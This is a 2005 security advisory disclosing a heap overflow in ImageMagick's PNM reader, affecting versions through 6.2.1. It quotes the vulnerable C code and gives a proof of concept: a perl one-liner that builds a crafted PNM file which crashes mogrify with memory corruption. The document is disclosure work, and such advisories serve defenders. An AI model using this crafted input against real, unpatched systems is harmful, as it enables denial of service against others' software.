Overflow Security Advisory #3 ImageMagick ReadPNMImage() Heap Overflow Vendor: ImageMagick (http://www.imagemagick.org) Affected version: 6.x up to and including 6.2.1 Vendor status: Fixed version released (6.2.2) Author: Damian Put <pucik@xxxxxxxxxxx> URL: http://www.overflow.pl/adv/imheapoverflow.txt Date: 25.04.2005 1. Background ImageMagick is a free software suite to create, edit, and compose bitmap images. It can read, convert and write images in a large variety of formats. http://www.imagemagick.org 2. Description Remote exploitation of a heap overflow vulnerability could allow execution of arbitrary code or couse denial of service. A heap overflow exists in ReadPNMImage() function, that is used to decode a PNM image files. The vulnerable code is: coders/pnm.c: static Image *ReadPNMImage(const ImageInfo *image_info,ExceptionInfo *exception) { ... if ((format == '1') || (format == '4')) max_value=1; /* bitmap */ else max_value=PNMInteger(image,10); image->depth=max_value < 256 ? 8UL : QuantumDepth; if ((format != '3') && (format != '6')) { image->storage_class=PseudoClass; image->colors=(unsigned long) (max_value >= MaxColormapSize ? MaxColormapSize : max_value+1); } ... if (AllocateImageColormap(image,image->colors) == MagickFalse) ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed"); if (format == '7') { /* Initialize 332 colormap. */ i=0; for (pixel.red=0; pixel.red < 8; pixel.red++) for (pixel.green=0; pixel.green < 8; pixel.green++) for (pixel.blue=0; pixel.blue < 4; pixel.blue++) { image->colormap[i].red=ScaleXToQuantum(pixel.red,0x07); image->colormap[i].green=ScaleXToQuantum(pixel.green,0x07); image->colormap[i].blue=ScaleXToQuantum(pixel.blue,0x03); i++; } } ... We can manipulate with image->colors value, becouse it`s atributted to "max_value" or MaxColormapSize variable. Allocation of memory for image->colormap is based on image->colors variable (AllocateImageColormap() function). If value of "image->colors" is for example 1, we allocate only 1*sizeof(PixelPacket) bytes of memory. Next, when format of PNM file is "7", image->colormap buffer is initialized by 332 colormaps. If image->colors*sizeof(PixelPacket) bytes are not enought for it, heap structures are overflowed. We cannot control contents of this buffer, so execute of arbitrary code is very difficult or imposible, but we can crash it in easy way. 3. PoC Example crafted PNM file: bash$ perl -e 'print "P7\n1\n1 1\n1"' > vuln.pnm We can test vulnerability with "mogrify" - standard ImageMagick utility: bash$ mogrify vuln.pnm *** glibc detected *** malloc(): memory corruption: 0x08701198 *** Przerwane (core dumped) bash$
